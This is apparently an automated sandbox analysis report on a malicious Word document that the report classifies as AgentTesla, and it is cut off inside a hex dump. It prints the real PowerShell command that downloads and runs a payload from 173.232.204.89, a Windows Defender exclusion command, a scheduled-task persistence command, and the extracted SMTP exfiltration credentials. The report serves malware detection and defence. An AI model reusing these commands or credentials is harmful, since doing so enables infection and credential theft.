Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Reconfirm The Details.doc

Overview

General Information

Sample Name:Reconfirm The Details.doc
Analysis ID:528737
MD5:9a7ea1172bf1250005e0fefce04f604f
SHA1:3df0782fc6ace41e15ca7c98277c79c128453d10
SHA256:80071fbb7234239c46ced3c6f0fd9aa7dbeafe79d7bfeed7993d51a69c4da006
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (drops PE files)
Yara detected AgentTesla
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Tries to steal Mail credentials (via file / registry access)
Document contains OLE streams with names of living off the land binaries
Sigma detected: Change PowerShell Policies to a Unsecure Level
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Powershell drops PE file
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Microsoft Office creates scripting files
Installs a global keyboard hook
Office process drops PE file
Injects files into Windows application
Tries to harvest and steal ftp login credentials
Bypasses PowerShell execution policy
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Tries to download and execute files (via powershell)
Sigma detected: Suspicius Add Task From User AppData Temp
Suspicious powershell command line found
Document contains a stream with embedded javascript code
Sigma detected: Powershell Defender Exclusion
Found suspicious RTF objects
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sigma detected: Verclsid.exe Runs COM Object
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Enables debug privileges
Document contains no OLE stream with summary information
Sigma detected: PowerShell Download from URL
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 236 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 1592 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • taskmg.exe (PID: 1156 cmdline: "C:\Users\user\AppData\Roaming\taskmg.exe" MD5: 815982590DE5E574ABB8A0310826E200)
        • powershell.exe (PID: 2924 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • schtasks.exe (PID: 1176 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • taskmg.exe (PID: 2784 cmdline: C:\Users\user\AppData\Roaming\taskmg.exe MD5: 815982590DE5E574ABB8A0310826E200)
    • powershell.exe (PID: 2804 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 2968 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • verclsid.exe (PID: 1200 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2856 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "m-konieczny@europecell.eu", "Password": "26DuBoBmcqO1", "Host": "us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000003.00000002.423965866.0000000000400000.00000004.00000020.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
      • 0x326b:$sb1: -W Hidden
      • 0x325b:$sc1: -NoP
      • 0x3265:$sd1: -NonI
      • 0x3275:$se3: -ExecutionPolicy bypass
      • 0x3260:$sf1: -sta
      00000009.00000002.446169718.000000000283F000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Click to see the 19 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          14.0.taskmg.exe.400000.13.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            14.0.taskmg.exe.400000.13.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              14.0.taskmg.exe.400000.9.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                14.0.taskmg.exe.400000.9.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  14.0.taskmg.exe.400000.11.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 15 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Change PowerShell Policies to a Unsecure LevelShow sources
                    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592
                    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592
                    Sigma detected: PowerShell DownloadFileShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592
                    Sigma detected: Suspicius Add Task From User AppData TempShow sources
                    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\taskmg.exe" , ParentImage: C:\Users\user\AppData\Roaming\taskmg.exe, ParentProcessId: 1156, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp, ProcessId: 1176
                    Sigma detected: Powershell Defender ExclusionShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\taskmg.exe" , ParentImage: C:\Users\user\AppData\Roaming\taskmg.exe, ParentProcessId: 1156, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, ProcessId: 2924
                    Sigma detected: Verclsid.exe Runs COM ObjectShow sources
                    Source: Process startedAuthor: Victor Sergeev, oscd.community: Data: Command: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 1200
                    Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
                    Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592
                    Sigma detected: PowerShell Download from URLShow sources
                    Source: Process startedAuthor: Florian Roth, oscd.community, Jonhnathan Ribeiro: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592
                    Sigma detected: Non Interactive PowerShellShow sources
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592

                    Data Obfuscation:

                    barindex
                    Sigma detected: Powershell download and execute fileShow sources
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 14.0.taskmg.exe.400000.13.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "m-konieczny@europecell.eu", "Password": "26DuBoBmcqO1", "Host": "us2.smtp.mailhostbox.com"}
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: Reconfirm The Details.docReversingLabs: Detection: 29%
                    Source: 14.0.taskmg.exe.400000.13.unpackAvira: Label: TR/Spy.Gen8
                    Source: 14.0.taskmg.exe.400000.9.unpackAvira: Label: TR/Spy.Gen8
                    Source: 14.0.taskmg.exe.400000.11.unpackAvira: Label: TR/Spy.Gen8
                    Source: 14.0.taskmg.exe.400000.5.unpackAvira: Label: TR/Spy.Gen8
                    Source: 14.0.taskmg.exe.400000.7.unpackAvira: Label: TR/Spy.Gen8
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbment.Automation.pdbBBX? source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdbV> source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

                    Software Vulnerabilities:

                    barindex
                    Document exploit detected (drops PE files)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: taskmg[1].exe.0.drJump to dropped file
                    Document exploit detected (creates forbidden files)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScTJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\taskmg[1].exeJump to behavior
                    Document exploit detected (process start blacklist hit)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 173.232.204.89:80
                    Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 173.232.204.89:80

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49167 -> 208.91.199.224:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49168 -> 208.91.199.225:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49169 -> 208.91.199.223:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49172 -> 208.91.199.224:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49173 -> 208.91.199.224:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49174 -> 208.91.198.143:587
                    Source: global trafficHTTP traffic detected: GET /taskmg.exe HTTP/1.1Host: 173.232.204.89Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.19.9Date: Thu, 25 Nov 2021 17:14:54 GMTContent-Type: application/octet-streamContent-Length: 777216Last-Modified: Thu, 25 Nov 2021 03:51:30 GMTConnection: keep-aliveETag: "619f0842-bdc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 42 08 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 0b 00 00 0a 00 00 00 00 00 00 ae ee 0b 00 00 20 00 00 00 00 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c ee 0b 00 4f 